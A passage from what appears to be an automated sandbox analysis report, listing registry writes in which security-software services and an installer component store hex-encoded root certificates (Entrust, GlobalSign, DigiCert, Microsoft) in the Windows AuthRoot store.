461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 190000000100000010000000fa46ce7cbb85cfb4310075313a09ee050300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d47e000000010000000800000000c001b39667d6011d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d341400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab0b000000010000001800000045006e00740072007500730074002e006e0065007400000062000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3397f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd942000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 040000000100000010000000be954f16012122448ca8bc279602acf50f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e0b00000001000000800000004d006900630072006f0073006f006600740020004900640065006e007400690074007900200056006500720069006600690063006100740069006f006e00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000320030003200300000006200000001000000200000005367f20c7ade0e2bca790915056d086b720c33c1fa2a2661acf787e3292e1270090000000100000016000000301406082b0601050507030306082b06010505070308140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a21d0000000100000010000000e78921f81cea4d4105d2b5f4afae0c78030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa21900000001000000100000009f687581f7ef744ecfc12b9cee6238f12000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 5c0000000100000004000000001000001900000001000000100000009f687581f7ef744ecfc12b9cee6238f1030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa21d0000000100000010000000e78921f81cea4d4105d2b5f4afae0c78140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2090000000100000016000000301406082b0601050507030306082b060105050703086200000001000000200000005367f20c7ade0e2bca790915056d086b720c33c1fa2a2661acf787e3292e12700b00000001000000800000004d006900630072006f0073006f006600740020004900640065006e007400690074007900200056006500720069006600690063006100740069006f006e00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000320030003200300000000f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e040000000100000010000000be954f16012122448ca8bc279602acf52000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 5c00000001000000040000000008000019000000010000001000000091fad483f14848a8a69b18b805cdbb3a030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d34317e000000010000000800000000c001b39667d6011d0000000100000010000000e871723e266f38af5d49cda2a502669c14000000010000001400000055e481d11180bed889b908a331f9a1240916b9700b000000010000001e00000045006e0074007200750073007400200028003200300034003800290000006200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1777f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d8040000000100000010000000ee2931bc327e9ae6e8b5f751b434719020000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa6